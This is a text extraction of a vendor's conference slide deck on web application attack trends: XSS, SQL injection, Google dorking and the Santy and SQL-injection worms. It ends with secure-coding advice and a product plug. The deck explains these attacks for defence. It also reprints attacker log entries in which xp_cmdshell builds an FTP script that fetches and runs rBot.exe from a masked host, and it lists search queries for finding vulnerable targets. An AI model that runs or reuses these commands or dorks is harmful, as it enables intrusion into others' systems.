Title: The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities Brian Christian, S
1The Hacking Evolution New Trends in Web
Application Exploits and Vulnerabilities Brian
Christian, Senior Security Engineer and
Co-Founder, S.P.I Dynamics
2Agenda
- Part 1 Introduction How on earth did we
get to this point? -
- Part 2 Identifying the Problem How does this
stuff happen? - Part 3 Key Application Vulnerabilities
Past, present and future -
- Part 4 Fixing the Problem - Detecting
application vulnerabilities and implementing a
security coding process -
- Part 5 More information and online resources
- Part 6 QA
-
3Part One
- Who We Are - SPI Dynamics in a nutshell
- Application Security -How did we get to this
point?
4SPI Dynamics
The Leader In Web Application Security Assessment
- We manufacture and license WebInspect, our
industry leading web application security
assessment product, to enterprises, consultants,
and other institutions, both directly and via
global partners. - We own the worlds leading database of web
application security vulnerabilities,
SecureBase. SecureBase is updated frequently by
SPI Labs, our U.S.-based research development
organization.
5Web Sites
Simple, single server solutions
Browser
6Web Applications
Very complex architectures, multiple platforms,
multiple protocols
Web Services
Database Server Customer Identification Access
Controls Transaction Information Core Business
Data
Application Server Business Logic Content services
Web Servers Presentation Layer Media Store
Wireless
Browser
7Common Web Applications
8The Absolute Truth
- All code has bugs regardless of platform,
language or application. - From a Microsoft to a Mom and Pops home- brewed
application, all code has bugs. - Some bugs are functionality bugs, which are
discovered by QA. - Other bugs are security bugs, which largely go
unidentified. - As long as functionality is the main objective
and not security, there will always be
vulnerabilities in computer applications.
9Why These Thing Happen
This is all the stuff that your application is
supposed to do.
10Why Web Application Attacks Occur
The Web Application Security Gap
Application Developers and QA Professionals
Dont Know Security
Security Professionals Dont Know The
Applications
As a Network Security Professional, I dont know
how my companys web applications are supposed to
work so I deploy a protective solutionbut dont
know if its protecting what its supposed to.
As an Application Developer, I can build great
features and functions while meeting deadlines,
but I dont know how to develop my web
application with security in mind.
11Web Applications Breach the Perimeter
HTTP
INTERNET
IMAP SSH POP3
FTP TELNET
Firewall only allows PORT 80 (or 443 SSL) traffic
from the internet to the web server. Any Web
Server 80
DMZ
Firewall only allows applications on the web
server to talk to application server. Web
Server Application Server
TRUSTED INSIDE
Firewall only
allows application
server to talk to database
server. Application Server
Database
CORPORATE INSIDE
12Web Applications Invite Public Access
Today over 70 of attacks against a companys
website or web application come at the
Application Layer not the network or system
layer.
- Gartner Group
13Web Application Risk
Web application incidents cost companies more
than 320,000,000 in 2001.
Forty-four percent (223 respondents) to the 2002
Computer Crime and Security Survey were willing
and/or able to quantify their financial losses.
These 223 respondents reported 455,848,000 in
financial losses.
2002 Computer Crime and Security
Survey Computer Security Institute San
Francisco FBI Computer Intrusion Squad
14Part Two
- What are the primary vulnerabilities?
- How and why they occur
15Web Application Vulnerabilities
Web application vulnerabilities occur in multiple
areas.
Application
Parameter Manipulation Cross-Site Scripting SQL
Injection Buffer Overflow Reverse Directory
Transversal JAVA Decompilation Path
Truncation Hidden Web Paths Cookie
Manipulation Application Mapping Backup
Checking Directory Enumeration
Administration
Extension Checking Common File Checks Data
Extension Checking Backup Checking Directory
Enumeration Path Truncation Hidden Web
Paths Forceful Browsing
Platform
Known Vulnerabilities
16Cross Site Scripting
17Cross Site Scripting (XSS)
- Cross-site scripting (also know as XSS or CSS)
occurs when dynamically generated web pages
display input that is not property validated. - A user passes input in the form of a parameter to
the web server. - The web server returns the user provided input
back to the user without proper encoding. - Again, a demonstration!
18SQL Injection
19SQL Injection Defined
- SQL injection is a technique for exploiting web
applications that use client-supplied data in SQL
queries without stripping potentially harmful
characters first. - Allow me to demonstrate!
20Part Three
- Key Application Vulnerabilities
- Past, Present and Future
- Google Hacking
21Google Hacking
- More then searching for great pr0n.
22Google Hacking
- Find vulnerable sites using Google (Old method
new life) - Example Search Queries
- filetypemdb inurladmin 180 results
- Filetypexls inurladmin 14,100 results
- ORA-00921 unexpected end of SQL command
3,470 results - allintitleNetscape Enterprise Server Home Page
431 results
23Google Hacking
- Take this method a step further and use it to
narrow your attack victims. - inurlid filetypeasp sitegov 572,000
results - inurlid filetypeasp sitecom 7,150,000
results - inurlid filetypeasp siteorg 3,240,000
results - Use this list as a baseline for identifying SQL
injection vulnerabilities
24Google Hacking
- Take this method a step further and use it to
narrow your attack victims. - inurlid filetypeasp sitegov 572,000
results - inurlid filetypeasp sitecom 7,150,000
results - inurlid filetypeasp siteorg 3,240,000
results - Use this list as a baseline for identifying SQL
injection vulnerabilities
25Google Hacking
- Took 1 hour of coding
- 500 vulnerable sites were found in 1 minute and
26 seconds
26Google Hacking
Find next victim
Exploit victim
Exploit victim
27The Past, the Present, and the Future of Hacking
- How prolific could this whole scenario be?
28Where Weve Been The Past
- Since most sites were static HTML, not much to do
but try to obtain root / admin privileges on the
machine or deface the website. - This proved for some great comedy.
29Where Were At The Present
- Since more dynamic and unique content has been
added to websites, and users demand even MORE
functionality so that they can do everything
electronically, insecure content was added at an
expedited pace! - And users and management demand even more!
-
30Where Were Going The Future
- Application hacking is becoming more complex as
applications are becoming more complex. The
possibilities are endless when it comes down to
what can you exploit in web applications. - Take for Instance Application Worms, Web
Application Worms.
31Enter the Santy Worm
- Perl.Santy is a worm written in Perl script that
attempts to spread to Web servers running
versions of the phpBB 2.x bulletin board software
Viewtopic.PHP PHP Script Injection Vulnerability
- Other systems are not affected. If successful,
the worm copies itself to the server and
overwrites the files with the following
extensions.asp, .htm, .jsp, .php, .phtm, .shtm - The worm uses the Google search engine to find
potential new infection targets. Google has now
implemented blocking Perl.Santy search requests,
which is expected to greatly reduce the worm's
ability to propagate and lower the risk of
further infections.
32Enter the Santy Worm
- Perl.Santy.A Computer Associates, Santy
F-Secure, Net-Worm.Perl.Santy.a Kaspersky,
Perl/Santy.worm McAfee, PHP/Santy.A.worm
Panda, Perl/Santy-A Sophos, WORM_SANTY.A
Trend Micro - UNIX, LINUX, Windows 2000, Windows 95, Windows
98, Windows Me, Windows NT, Windows Server 2003,
Windows XP
33But There Are Even Worse Worms
- New evidence suggests that a new worm has been
discovered in the wild that takes advantage of
SQL Injection vulnerabilities. - A Jan 5th post on seclists.org by Maxime Ducharme
describes an attack made on his companys
machines where a hybrid worm (a cross between
Santy and Randex) was identified in his logs.
34http//www.google.com/search?num100hlenlras_
qdrallqallinurl3A22viewtopic.php2222
35Log Entries
- exec MASTER..xp_cmdshell 'mkdir
systemroot\system32\Macromed\lolx\' - exec MASTER..xp_cmdshell 'echo open y.y.y.y 21
systemroot\system32\Macromed\lolx\blah.jkd' - exec MASTER..xp_cmdshell 'echo USER hahajk
hahaowned systemroot\system32\macromed\lolx\
blah.jkd' - exec MASTER..xp_cmdshell 'echo get rBot.exe
systemroot\system32\Macromed\lolx\arcdlrde.exe
systemroot\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'echo quit
systemroot\system32\Macromed\lolx\blah.jkd' - exec MASTER..xp_cmdshell 'ftp.exe -i -n -v
-ssystemroot\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'del systemroot\system3
2\Macromed\lolx\blah.jkd' exec
MASTER..xp_cmdshell 'systemroot\system32\Macrome
d\lolx\arcdlrde.exe
36Even Hits Close to Home
- Our RD researcher Bob Auger who runs
CGISECURITY.NET found suspicious entries in his
logs. - He was running FreeBSD.
- So like all good site operators he followed them
back to the IRC channel that they were using to
control the worm. - He was unable to follow them after the 3rd hop
they made to control the worm.
37Fact or Fiction? FACT!
- Web Application Worms are the new emerging
threat. - We are beginning to see the first generation of
these emerging threats. - Current Anti-virus solutions are reactive, not
proactive. - Worms could be propagating right now, but very
few people check their weblogs or scan their
sites looking for SQL injection.
38Part Four - Fixing the Problem
- Detecting Application Vulnerabilities
- And Implementing a Secure Coding Process
- Instituting a secure coding process
- How we build the products to make the process work
39Enterprise-Wide Web Application Security
- Web Application Security testing must be applied
in all phases of the Application Lifecycle and by
all constituencies throughout the enterprise
Auditors, Application Developers, QA and Security
Operations.
40Enterprise-Wide Web Application Security
- Must have clear cut security requirement to
follow during Development and QA phases - Need to run automated tests on code during
Development phase - Must utilize secure code for re-use
- Require automated testing products that integrate
into current environment
41Enterprise-Wide Web Application Security
Quality Assurance Professionals
- Must test applications not only for functionality
but also for security - Must test environments for potential flaws and
insecurities - Must provide detailed security flaw reports to
development - Require automated testing products that integrate
into current environment
D
D
A
A
Web
Web
Web
Web
Application
Application
Application
Security
Security
S
S
42Enterprise-Wide Web Application Security
Security Auditors and Risk and
Compliance Officers
- Help define regulatory requirements during the
Definition phase of the Application Lifecycle - Assess applications once they are in the
Production phase to validate compliance - Must act as resource for what is and is not
acceptable
D
D
Web
Web
Web
Web
Application
Application
Application
Security
Security
S
Q
S
Q
43Enterprise-Wide Web Application Security
- Must continually test application in a real world
environment to asses impact of ongoing code
changes - Must look for all levels of web vulnerabilities
- Platform
- Informational
- Application
D
D
A
A
Web
Web
Web
Web
Application
Application
Application
Security
Security
Q
Q
S
S
Security
44Part Five
- Websites and mailing lists on the net
45Websites
- - www.spidynamics.com
- Web Application Security Consortium -
www.webappsec.org - CGISecurity.net http//www.cgisecurity.net/
- Open Web Application security Project -
www.owasp.org - WebAppSec Mailing list Security Focus
46Questions?
47Contact
SPI Dynamics, Inc. 115 Perimeter Center
Place Suite 1100 Atlanta, GA 30346
For a free WebInspectTM 15-day trial download
visit www.spidynamics.com